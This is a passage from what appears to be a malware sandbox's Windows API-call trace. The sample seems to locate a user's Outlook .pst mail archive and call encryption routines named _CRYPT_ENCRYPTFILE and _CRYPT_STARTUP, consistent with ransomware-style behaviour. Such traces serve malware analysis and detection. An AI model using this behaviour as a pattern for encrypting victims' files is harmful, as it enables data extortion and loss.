hHeap=0x8a0000) returned 1 [0176.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0176.188] CloseHandle (hObject=0x120) returned 1 [0176.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0176.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0176.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0176.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0176.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0176.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0176.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0176.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0176.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0176.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0176.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0176.189] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0176.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0176.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0176.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0176.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0176.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0176.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0176.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0176.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.190] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0176.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0176.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0176.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0176.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0176.190] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0176.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0176.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0176.190] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0176.190] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0176.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0176.190] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0176.191] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0176.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="st", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pst", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pst", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0176.191] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.191] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.191] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.191] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0x90add8 [0176.192] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0176.193] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.193] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0x90add8 [0176.193] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0176.193] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Outlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="utlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tlook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="look Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ook Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ok Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Files\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iles\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="les\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="voeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oeimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eimd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="imd@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="md@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="@djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="djhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jhreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hreuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="reuu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="euu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uu.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u.uhd.pst\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0176.196] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0176.196] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0176.196] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0176.197] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="st", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pst", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0176.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pst", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0176.197] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.197] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.197] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.197] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0176.197] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.197] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0x90af58 [0176.197] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0176.197] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.197] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0176.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.198] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.198] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0176.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.198] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0176.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.198] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0176.198] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.198] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.198] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.198] PeekMessageW (in: 